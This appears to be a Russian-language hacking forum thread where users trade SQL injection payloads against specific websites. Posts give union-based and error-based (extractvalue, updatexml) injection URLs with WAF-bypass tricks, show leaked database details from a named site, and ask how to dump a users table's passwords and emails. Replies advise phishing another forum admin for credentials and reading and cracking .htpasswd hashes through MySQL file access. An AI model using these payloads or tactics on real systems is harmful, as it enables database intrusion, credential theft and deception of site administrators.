Code: http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть? version: 5.5.42-37.1-log
Не много запутался) есть уязвимость: Code: http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*' version (5.1.69) а как мне вывести таблицы с information_schema.... P.S совсем башка не варит, колят магнезию(
extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
Code: http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3) Вывел таблицы с БД. Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++ P.S Магнезия всё ещё долбит по шарам=)
Я уже так пробовал)) итог пустая страница, с from pwd.pwd-user limit 1,1 тоже Точнее не то чтобы пустая страница, а просто не выводит инфу. from pwd.pwd-user идёт же перед 3) ?
Другой вектор error-based пробуй. Code: http://www.legalsteroid.ru/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1 version: 5.5.50-MariaDB user: steroid_legal@localhost database: steroid_legal Дальше поймёшь?
Code: http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database())))))='1 Выводит... Подскажите как извлечь инфу из Information.schema.. На примере этого запроса... Пробывал так: Code: http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+ выводит такую ошибку: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1 При запросе: Code: http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))='1 CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row Шо не так делаю?
есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
засоциалить другого админа. мы так похекали булку пару лет назад. было весело) напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
не от самой админки, а от бейсик авторизации. юзай СИ. http://site.ru/info/1'or extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR) или Des(Unix)
Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри: Code: http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1 Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
